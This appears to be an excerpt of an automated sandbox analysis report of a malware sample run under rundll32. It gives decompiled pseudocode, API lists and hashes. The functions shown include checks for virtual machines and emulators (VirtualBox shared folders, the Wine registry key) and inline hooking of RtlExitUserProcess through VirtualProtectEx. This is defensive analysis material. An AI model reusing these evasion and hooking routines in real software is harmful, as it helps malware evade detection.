                                        • Instruction ID: 4bcc86f58dd0bc85c4c86b09f78003257b6d7aa6b2ed67b4232f3722d52629d8
                                        • Opcode Fuzzy Hash: b51c7cb60d147e5c0669e2db15bcc3ed022d0b02608c378374a75aaf55dc55d9
                                        • Instruction Fuzzy Hash: F321533520674041FE25EBA1A8582EBA7F9AFA4BC4F0A4535DE4907F56DF3CC822C640
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3020EE0 Relevance: 7.6, APIs: 5, Instructions: 56registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$OpenQueryValue
                                        • String ID:
                                        • API String ID: 1607946009-0
                                        • Opcode ID: 80fb25d1c761cdd6296609965d16f533f97d65c48d945b5779956fb6042f6aac
                                        • Instruction ID: b1cc15bb8baf222b080a500d9da4d454ff055771680d9558f012e5cadad436c9
                                        • Opcode Fuzzy Hash: 80fb25d1c761cdd6296609965d16f533f97d65c48d945b5779956fb6042f6aac
                                        • Instruction Fuzzy Hash: B0210072324A8082EF609B11FC5879B63A5FBD9B94F465125AE8D47F58DF3CC455CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301B7D8 Relevance: 6.1, APIs: 4, Instructions: 87memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocQuery
                                        • String ID:
                                        • API String ID: 31662377-0
                                        • Opcode ID: b56fdc160a3053fb9bded151c2404bcb637792cd7786b653b91c43bb34dcc33a
                                        • Instruction ID: c7d65cc20fdddacf0340fce92c6e6c5168bb1d51d97843a3a2e192c73ca2c989
                                        • Opcode Fuzzy Hash: b56fdc160a3053fb9bded151c2404bcb637792cd7786b653b91c43bb34dcc33a
                                        • Instruction Fuzzy Hash: D031A13170664482FE21AB12E9187A763E0B368FD4F195526ED5E17F89DBBCC543CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301B69C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E0000021E21EF301B69C(void* __edi, long long __rax, long long __rbx, long long __rdi, long long __r9, long long _a8, long long _a16, char _a32) {
				void* _t16;
				intOrPtr _t24;
				void* _t25;
				long long _t42;
				intOrPtr* _t43;
				signed long long _t44;
				intOrPtr* _t52;
				intOrPtr _t53;
				void* _t61;
				char* _t63;

				_t60 = __r9;
				_t42 = __rax;
				_a8 = __rbx;
				_a16 = __rdi;
				_a32 = __r9;
				GetModuleHandleA(??);
				if (__rax == 0) goto 0xf301b765;
				_a32 = __rax;
				E0000021E21EF301C2B0(_t25,  &_a32, "RtlExitUserProcess", _t61); // executed
				if (_t42 == 0) goto 0xf301b765;
				 *0xf320b29c = 1;
				if ( *0xf320b29c == 1) goto 0xf301b6ea;
				_t52 =  *0xf320b508;
				if (_t52 == 0) goto 0xf301b74f;
				_t24 =  *0xf320b514;
				if (_t24 == 0) goto 0xf301b723;
				_t43 = _t52;
				if ( *_t43 == 0) goto 0xf301b759;
				_t44 = _t43 + 0x3c;
				if (1 - _t24 < 0) goto 0xf301b715;
				if (1 == 0xffffffff) goto 0xf301b74f;
				_t63 = _t44 * 0x3c + _t52;
				_t53 = _a32;
				 *((long long*)(_t63 + 1)) = _t42;
				_t16 = E0000021E21EF301B4BC(_t44, __rbx, _t63, _t53, _t42, _t60); // executed
				if (_t16 != 0) goto 0xf301b74f;
				 *_t63 = 0;
				 *0xf320b29c = 0;
				goto 0xf301b768;
				 *((char*)(_t44 * 0x3c + _t53)) = 1;
				goto 0xf301b726;
				return 0xffffffff;
			}













                                        0x21ef301b69c
                                        0x21ef301b69c
                                        0x21ef301b69c
                                        0x21ef301b6a1
                                        0x21ef301b6a6
                                        0x21ef301b6b8
                                        0x21ef301b6c3
                                        0x21ef301b6d0
                                        0x21ef301b6da
                                        0x21ef301b6e5
                                        0x21ef301b6ef
                                        0x21ef301b6f8
                                        0x21ef301b6fa
                                        0x21ef301b704
                                        0x21ef301b706
                                        0x21ef301b710
                                        0x21ef301b712
                                        0x21ef301b717
                                        0x21ef301b71b
                                        0x21ef301b721
                                        0x21ef301b729
                                        0x21ef301b731
                                        0x21ef301b734
                                        0x21ef301b73c
                                        0x21ef301b740
                                        0x21ef301b747
                                        0x21ef301b749
                                        0x21ef301b74f
                                        0x21ef301b757
                                        0x21ef301b75f
                                        0x21ef301b763
                                        0x21ef301b778

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: HandleModulelstrcmp
                                        • String ID: RtlExitUserProcess$ntdll.dll
                                        • API String ID: 4066981444-1735925572
                                        • Opcode ID: 4db69128b072396db0a7319d1b8295cadff92eb00c7c4801250883dabf3213f8
                                        • Instruction ID: 28c0149b1f4406eb008315da15c6e749df732eec6eb2ff39eeaa2eee07860ea9
                                        • Opcode Fuzzy Hash: 4db69128b072396db0a7319d1b8295cadff92eb00c7c4801250883dabf3213f8
                                        • Instruction Fuzzy Hash: D521DA76305B4041FE25EB19AC583AB6792A7A57A0F165227DD5907FE6EB3CC443C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301E8F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33shareCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 34%
                                        			E0000021E21EF301E8F0() {
				signed long long _v24;
				char _v552;
				intOrPtr _v568;
				int _t11;
				void* _t13;
				void* _t18;
				void* _t19;
				signed long long _t23;
				void* _t29;
				void* _t32;
				signed long long _t33;
				void* _t34;

				_t23 =  *0xf3203000; // 0x1fc8e4a4378e
				_v24 = _t23 ^ _t33;
				r8d = 0x208;
				E0000021E21EF310E410(_t13, 0, _t18, _t19,  &_v552, _t29, _t32, _t34);
				_v568 = 0x104;
				_t11 = WNetGetProviderNameW(??, ??, ??); // executed
				if (_t11 != 0) goto 0xf301e96f;
				__imp__StrCmpIW();
				E0000021E21EF310C290();
				return 0 | _t11 == 0x00000000;
			}















                                        0x21ef301e8f7
                                        0x21ef301e901
                                        0x21ef301e910
                                        0x21ef301e916
                                        0x21ef301e920
                                        0x21ef301e932
                                        0x21ef301e93a
                                        0x21ef301e948
                                        0x21ef301e962
                                        0x21ef301e96e

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: NameProvider
                                        • String ID: VirtualBox Shared Folders
                                        • API String ID: 262172401-2247368375
                                        • Opcode ID: 47de9dabbb41c250f91913fc77dcf4a50a5d8604f73302efefae0fb9d738503c
                                        • Instruction ID: 7010f009ec96fed6ec9c34d1544768af4f0a317dcd122118375d910d42e4554d
                                        • Opcode Fuzzy Hash: 47de9dabbb41c250f91913fc77dcf4a50a5d8604f73302efefae0fb9d738503c
                                        • Instruction Fuzzy Hash: 2E01FF76714A8082FF60EB25EC593DB63A0F7D9745FC15116EE8E86A95EE3CC106CA00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF30201D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpen
                                        • String ID: SOFTWARE\Wine
                                        • API String ID: 47109696-1166244655
                                        • Opcode ID: 508ce3090052390ecea74677034d38ef4e635124e9f833a977fb632fa3428459
                                        • Instruction ID: 2cb512961fa1198096b0a6c25263e3c83fac161354a6cdb8cece7cf6bc2e8df2
                                        • Opcode Fuzzy Hash: 508ce3090052390ecea74677034d38ef4e635124e9f833a977fb632fa3428459
                                        • Instruction Fuzzy Hash: B4F03036610A8082EF609B21F85979B63A0FBD8744F811111AD4D47A95EE3CC016CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3126904 Relevance: 3.8, APIs: 3, Instructions: 46COMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 60%
                                        			E0000021E21EF3126904(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r9, long long _a8, long long _a16) {
				void* _t6;
				void* _t11;
				intOrPtr _t13;
				intOrPtr _t16;
				void* _t27;
				void* _t31;
				void* _t33;
				void* _t36;

				_t33 = __rdx;
				_t31 = __rcx;
				_t29 = __rbx;
				_t27 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				GetLastError();
				_t13 =  *0xf32032b0; // 0x7
				if (_t13 == 0xffffffff) goto 0xf3126935;
				_t6 = E0000021E21EF3126F7C(_t13, __rax, __rbx);
				if (__rax != 0) goto 0xf3126976;
				E0000021E21EF3122114(_t6, _t31, _t33); // executed
				_t36 = _t27;
				if (_t27 != 0) goto 0xf3126955;
				E0000021E21EF3124EE0(_t27, _t31);
				goto 0xf312697b;
				_t16 =  *0xf32032b0; // 0x7
				if (E0000021E21EF3126FD4(_t16, _t27, _t29, _t27, __rsi) == 0) goto 0xf312694e;
				E0000021E21EF31265DC(_t36, _t27);
				_t11 = E0000021E21EF3124EE0(_t27, _t36);
				if (_t36 != 0) goto 0xf3126985;
				SetLastError(??);
				goto 0xf3126990;
				SetLastError(??);
				return _t11;
			}











                                        0x21ef3126904
                                        0x21ef3126904
                                        0x21ef3126904
                                        0x21ef3126904
                                        0x21ef3126904
                                        0x21ef3126909
                                        0x21ef3126913
                                        0x21ef3126919
                                        0x21ef3126926
                                        0x21ef3126928
                                        0x21ef3126933
                                        0x21ef312693f
                                        0x21ef3126944
                                        0x21ef312694a
                                        0x21ef312694e
                                        0x21ef3126953
                                        0x21ef3126955
                                        0x21ef3126968
                                        0x21ef312696a
                                        0x21ef3126971
                                        0x21ef3126979
                                        0x21ef312697d
                                        0x21ef3126983
                                        0x21ef3126987
                                        0x21ef31269a2

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast
                                        • String ID:
                                        • API String ID: 1452528299-0
                                        • Opcode ID: 5f7c3cdbe70bcf1203e98d7aed0c86dfc712dabaf6b4182bb22bdb7db2f05dbd
                                        • Instruction ID: 319f1065785c7b14830e67284cfa59373fea1d064e77933b8552594758eecd74
                                        • Opcode Fuzzy Hash: 5f7c3cdbe70bcf1203e98d7aed0c86dfc712dabaf6b4182bb22bdb7db2f05dbd
                                        • Instruction Fuzzy Hash: 7E11793030079046FF79A722AD5D3ABA1F59B68BD0F024528AD5A07FDAEE6CC857C200
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3020950 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID: @
                                        • API String ID: 1890195054-2766056989
                                        • Opcode ID: 36c4e4fc9a72edbeb5d665243015828acae3b8321c3bf15e408e2c7754fcf596
                                        • Instruction ID: 195fb9a972849eb4d24e525b161a3e6d7ac61de208f86d16d43d083ebb4760fb
                                        • Opcode Fuzzy Hash: 36c4e4fc9a72edbeb5d665243015828acae3b8321c3bf15e408e2c7754fcf596
                                        • Instruction Fuzzy Hash: 4FF0E27661AF5089EB90CB22E84938E33E5F79C740F424139DA9D86B14EE398525CF00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301B4BC Relevance: 3.1, APIs: 2, Instructions: 134COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 29%
                                        			E0000021E21EF301B4BC(signed int __rax, long long __rbx, void* __rcx, long long __rdx, long long __r8, signed int __r9, long long _a8, char _a24, intOrPtr _a25, char _a28, signed int _a32) {
				long long _v40;
				void* __rsi;
				void* __rbp;
				signed char _t56;
				int _t61;
				void* _t65;
				void* _t66;
				void* _t73;
				void* _t78;
				signed char _t88;
				signed long long _t92;
				long long _t94;
				void* _t97;
				signed long long _t107;
				intOrPtr* _t108;
				signed long long _t109;
				intOrPtr* _t111;
				void* _t117;
				long long _t118;
				void* _t119;
				long long _t120;
				char* _t126;
				intOrPtr* _t128;

				_a8 = __rbx;
				_a32 = __r9;
				_a24 = __r8;
				r9d = r9d | 0xffffffff;
				r10d = 0;
				_t118 = __rdx;
				_t97 = __rcx;
				if ( *0xf320b514 - r10d <= 0) goto 0xf301b546;
				_t107 = __rax * 0x3c;
				_t92 =  *0xf320b508;
				if ( *((char*)(_t107 + _t92)) == 0) goto 0xf301b533;
				if ( *((intOrPtr*)(_t107 + _t92 + 0x28)) != __rdx) goto 0xf301b533;
				_t108 =  *((intOrPtr*)(_t107 + _t92 + 0x30));
				r8d = 0;
				_t78 =  *_t108 - r8d;
				if (_t78 <= 0) goto 0xf301b52d;
				asm("lock bts dword [ecx+edx+0x4], 0x0");
				if (_t78 >= 0) goto 0xf301b52a;
				r8d = r8d + 1;
				if (r8d -  *_t108 < 0) goto 0xf301b510;
				goto 0xf301b52d;
				r9d = r8d;
				if (r9d != 0xffffffff) goto 0xf301b541;
				r10d = r10d + 1;
				if (r10d -  *0xf320b514 < 0) goto 0xf301b4e8;
				if (_t108 != 0) goto 0xf301b566;
				E0000021E21EF301B7D8(_t66, _t92, __rcx, __rdx, __rdx, _t119); // executed
				_t109 = _t92;
				if (_t92 == 0) goto 0xf301b56a;
				 *_t92 = 0x42;
				r9d = 0;
				 *((intOrPtr*)(_t92 + 4)) = 1;
				 *(_t97 + 0x38) = r9d;
				 *(_t97 + 0x30) = _t109;
				if (_t109 != 0) goto 0xf301b57a;
				goto 0xf301b68e;
				r8d = 0x2c;
				_t117 = _t92 * 0x3e + _t109;
				_t13 = _t117 + 0x16; // 0x16
				_t120 = _t13;
				E0000021E21EF301B77C(0x90, _t120);
				_t56 = E0000021E21EF301C02C(_t65, 0x90, _t73, _t97,  *((intOrPtr*)(_t97 + 1)), _t120);
				 *(_t97 + 9) = _t56 & 0x000000ff;
				if (_t56 != 0) goto 0xf301b5b4;
				 *(_t117 + 4) =  *(_t117 + 4) & 0x00000000;
				goto 0xf301b573;
				_t111 =  *((intOrPtr*)(_t97 + 1));
				_t126 = _t97 + 0xa;
				if (_t126 == 0) goto 0xf301b5da;
				if (_t111 == 0) goto 0xf301b5da;
				_t88 = _t56;
				if (_t88 == 0) goto 0xf301b5da;
				 *_t126 =  *_t111;
				if (_t88 != 0) goto 0xf301b5ca;
				 *((long long*)(_t97 + 0x28)) = _t118;
				_t21 = _t117 + 4; // 0x4
				 *0xf320b290 = _t120;
				 *(_t117 + 0xa) =  *(_t117 + 0xa) & 0x00000000;
				_a25 = _t21 -  *((intOrPtr*)(_t97 + 1)) - 1;
				r9d = 0x40;
				 *((short*)(_t117 + 8)) = 0x25ff;
				 *((long long*)(_t117 + 0xe)) = 0x21ef2fe7660;
				r8d =  *(_t97 + 9) & 0x000000ff;
				_t94 =  &_a32;
				_v40 = _t94;
				_a24 = 0xe9;
				_t61 = VirtualProtectEx(??, ??, ??, ??, ??); // executed
				if (_t61 == 0) goto 0xf301b5ae;
				 *(_t117 + 0x36) =  *(_t117 + 0x36) & 0x00000000;
				 *((short*)(_t117 + 0x34)) = 0x25ff;
				 *((long long*)(_t117 + 0x3a)) = _t94 +  *((intOrPtr*)(_t97 + 1));
				_t128 =  *((intOrPtr*)(_t97 + 1));
				if (_t128 == 0) goto 0xf301b668;
				 *_t128 = _a24;
				 *((char*)(_t128 + 4)) = _a28;
				r8d =  *(_t97 + 9) & 0x000000ff;
				r9d = _a32;
				_v40 =  &_a32;
				VirtualProtectEx(??, ??, ??, ??, ??); // executed
				return 1;
			}


























                                        0x21ef301b4bc
                                        0x21ef301b4c1
                                        0x21ef301b4c6
                                        0x21ef301b4d2
                                        0x21ef301b4d6
                                        0x21ef301b4e0
                                        0x21ef301b4e3
                                        0x21ef301b4e6
                                        0x21ef301b4eb
                                        0x21ef301b4ef
                                        0x21ef301b4fa
                                        0x21ef301b501
                                        0x21ef301b503
                                        0x21ef301b508
                                        0x21ef301b50b
                                        0x21ef301b50e
                                        0x21ef301b517
                                        0x21ef301b51e
                                        0x21ef301b520
                                        0x21ef301b526
                                        0x21ef301b528
                                        0x21ef301b52a
                                        0x21ef301b531
                                        0x21ef301b533
                                        0x21ef301b53f
                                        0x21ef301b544
                                        0x21ef301b549
                                        0x21ef301b54e
                                        0x21ef301b554
                                        0x21ef301b556
                                        0x21ef301b55c
                                        0x21ef301b55f
                                        0x21ef301b566
                                        0x21ef301b56a
                                        0x21ef301b571
                                        0x21ef301b575
                                        0x21ef301b57d
                                        0x21ef301b587
                                        0x21ef301b58c
                                        0x21ef301b58c
                                        0x21ef301b593
                                        0x21ef301b59f
                                        0x21ef301b5a7
                                        0x21ef301b5ac
                                        0x21ef301b5ae
                                        0x21ef301b5b2
                                        0x21ef301b5b4
                                        0x21ef301b5b8
                                        0x21ef301b5bf
                                        0x21ef301b5c4
                                        0x21ef301b5c6
                                        0x21ef301b5c8
                                        0x21ef301b5cf
                                        0x21ef301b5d8
                                        0x21ef301b5da
                                        0x21ef301b5de
                                        0x21ef301b5e1
                                        0x21ef301b5f4
                                        0x21ef301b5fa
                                        0x21ef301b5fe
                                        0x21ef301b604
                                        0x21ef301b60f
                                        0x21ef301b616
                                        0x21ef301b61b
                                        0x21ef301b624
                                        0x21ef301b629
                                        0x21ef301b62e
                                        0x21ef301b636
                                        0x21ef301b63c
                                        0x21ef301b640
                                        0x21ef301b64c
                                        0x21ef301b650
                                        0x21ef301b657
                                        0x21ef301b65d
                                        0x21ef301b664
                                        0x21ef301b668
                                        0x21ef301b672
                                        0x21ef301b67a
                                        0x21ef301b683
                                        0x21ef301b69a

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 9fb0c2c09bb39161c8a4ff82b7e0cb5fb1810189b0aab8124f3229747900a979
                                        • Instruction ID: 4b5affae79b5485d900d2c516c4b0a7c5c971441ea14eeb0c43142cc8c83b2ed
                                        • Opcode Fuzzy Hash: 9fb0c2c09bb39161c8a4ff82b7e0cb5fb1810189b0aab8124f3229747900a979
                                        • Instruction Fuzzy Hash: 7851E7B22057808AEF50DF25E94879A7BA1F764B94F45A212CF5807FDADB3CC452C710
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FE9060 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 16%
                                        			E0000021E21EF2FE9060() {
				void* _t3;
				long _t7;
				void* _t20;
				signed int _t21;

				_t3 = E0000021E21EF301DF60(_t21); // executed
				if (_t3 != 0) goto 0xf2fe90ac;
				r8d = E0000021E21EF3111C60(_t20);
				r8d = r8d - ((r8d - (0x86186187 * r8d >> 0x20) >> 1) + (0x86186187 * r8d >> 0x20) >> 4) * 0x15;
				r8d = r8d + 0x19;
				Sleep(??); // executed
				_t7 = SleepEx(??, ??); // executed
				if (_t7 == 0) goto 0xf2fe9070;
				ExitProcess(??);
			}







                                        0x21ef2fe9064
                                        0x21ef2fe906b
                                        0x21ef2fe9075
                                        0x21ef2fe908f
                                        0x21ef2fe9092
                                        0x21ef2fe909d
                                        0x21ef2fe90a3
                                        0x21ef2fe90aa
                                        0x21ef2fe90ae

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        • Opcode ID: 59e923e2e4e7e70a8320ca0915166019d36061a5bfecac1658bbf2b55990c359
                                        • Instruction ID: 6c0e1caf97f1feb5386657388686978d012e7b66e08ae11a3e594acfd9a0377f
                                        • Opcode Fuzzy Hash: 59e923e2e4e7e70a8320ca0915166019d36061a5bfecac1658bbf2b55990c359
                                        • Instruction Fuzzy Hash: 8B014F32201FC099FB75AF75AC487DA27E4E794B24F1606599D650AED9CF38C192D210
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FE59D0 Relevance: 1.5, APIs: 1, Instructions: 14networkCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 16%
                                        			E0000021E21EF2FE59D0(void* __rax) {
				void* _v424;
				void* _t9;

				E0000021E21EF310BA74(_t9, __rax);
				asm("lock xadd [0x225c40], eax");
				if (1 != 1) goto 0xf2fe5a0b;
				__imp__#115(); // executed
				 *0xf320b634 = 2;
				return  *0xf320b634;
			}





                                        0x21ef2fe59de
                                        0x21ef2fe59e8
                                        0x21ef2fe59f5
                                        0x21ef2fe59ff
                                        0x21ef2fe5a05
                                        0x21ef2fe5a12

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Startup_onexit
                                        • String ID:
                                        • API String ID: 3012808385-0
                                        • Opcode ID: f80053a0be1704bd1f2324de440d2160bba4a7bdb83e0f02692eb67ed97eb85f
                                        • Instruction ID: 820fd3313e5c49825e349d37be512cde3de641ef6778d694b02f8d8040f4b453
                                        • Opcode Fuzzy Hash: f80053a0be1704bd1f2324de440d2160bba4a7bdb83e0f02692eb67ed97eb85f
                                        • Instruction Fuzzy Hash: 2CE0463196109186FF20AB10EC883D923A0F3A5B05F828420CD1682AA4DF1CC60FCB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301C2B0 Relevance: 1.4, APIs: 1, Instructions: 122stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcmp
                                        • String ID:
                                        • API String ID: 1534048567-0
                                        • Opcode ID: 712ea7422294f85eee90d18edfa9bbc4007d45bd4d2038063b56021a9ba7c6b9
                                        • Instruction ID: 62563edcf8cc186a95db52ff6417fd1425197ecbfcaa5f0ee284929383ac4f0c
                                        • Opcode Fuzzy Hash: 712ea7422294f85eee90d18edfa9bbc4007d45bd4d2038063b56021a9ba7c6b9
                                        • Instruction Fuzzy Hash: AE41B232205564A7DE24DF45EC087BE73A1F764B88F2984329E8643E46EB7CE8D2D704
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3122114 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E0000021E21EF3122114(void* __eax, signed int __rcx, signed int __rdx) {
				void* __rbx;
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0xf3122133;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0xf3122176;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0xf312215a;
				if (E0000021E21EF3130330() == 0) goto 0xf3122176;
				if (E0000021E21EF3125368(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0xf3122176;
				HeapAlloc(??, ??, ??); // executed
				if (_t22 == 0) goto 0xf3122145;
				goto 0xf3122183;
				E0000021E21EF3118984(_t22);
				 *_t22 = 0xc;
				return 0;
			}






                                        0x21ef3122114
                                        0x21ef3122123
                                        0x21ef3122127
                                        0x21ef3122127
                                        0x21ef3122131
                                        0x21ef312213f
                                        0x21ef3122143
                                        0x21ef312214c
                                        0x21ef3122158
                                        0x21ef3122169
                                        0x21ef3122172
                                        0x21ef3122174
                                        0x21ef3122176
                                        0x21ef312217b
                                        0x21ef3122188

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocHeap
                                        • String ID:
                                        • API String ID: 4292702814-0
                                        • Opcode ID: 43535b9866986d02a1fe364ae6e00c58a0a00d596ad5376eedc1b5b782362f28
                                        • Instruction ID: 0bec6a145d7f302076f93feb4a0861d23fcec94795d652a5f14520f21023063d
                                        • Opcode Fuzzy Hash: 43535b9866986d02a1fe364ae6e00c58a0a00d596ad5376eedc1b5b782362f28
                                        • Instruction Fuzzy Hash: 04F0907430124586FEB857619D5CBEB52F16BF8B80F0E84340E0A86FD1EE6CC987C210
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FEAE60 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E0000021E21EF2FEAE60(void* __edx, long long __rax, void* __rcx, char _a16) {
				long long _v16;
				intOrPtr _v24;
				void* _t25;
				long long _t31;
				void* _t32;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t37;

				_t33 = __rcx;
				_a16 = 0;
				if (__edx != 1) goto 0xf2feaf05;
				asm("o16 nop [eax+eax]");
				 *0xf320b29c = 1;
				if ( *0xf320b29c == 1) goto 0xf2feae80;
				if ( *0xf320b508 == 0) goto 0xf2feaea4;
				 *0xf320b29c = 0;
				goto 0xf2feaed4;
				r8d = 0x3000;
				_t4 = _t33 + 4; // 0x4, executed
				r9d = _t4;
				VirtualAlloc(??, ??, ??, ??); // executed
				 *0xf320b514 = 0xa;
				 *0xf320b508 = __rax;
				 *0xf320b29c = 0;
				E0000021E21EF301B69C(_t25, __rax, _t32, _t34, _t37); // executed
				_t31 =  &_a16;
				r9d = 0;
				_v16 = _t31;
				_v24 = 0;
				E0000021E21EF3111DF0(0, 0, _t31, _t32, _t33, _t35, 0x21ef2fe90c0, _t37); // executed
				 *0xf320b4a8 = _t31;
				return 1;
			}












                                        0x21ef2feae60
                                        0x21ef2feae64
                                        0x21ef2feae6f
                                        0x21ef2feae75
                                        0x21ef2feae85
                                        0x21ef2feae8e
                                        0x21ef2feae98
                                        0x21ef2feae9c
                                        0x21ef2feaea2
                                        0x21ef2feaeab
                                        0x21ef2feaeb1
                                        0x21ef2feaeb1
                                        0x21ef2feaeb5
                                        0x21ef2feaebd
                                        0x21ef2feaec7
                                        0x21ef2feaece
                                        0x21ef2feaed4
                                        0x21ef2feaed9
                                        0x21ef2feaede
                                        0x21ef2feaee1
                                        0x21ef2feaeef
                                        0x21ef2feaef9
                                        0x21ef2feaefe
                                        0x21ef2feaf0e

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
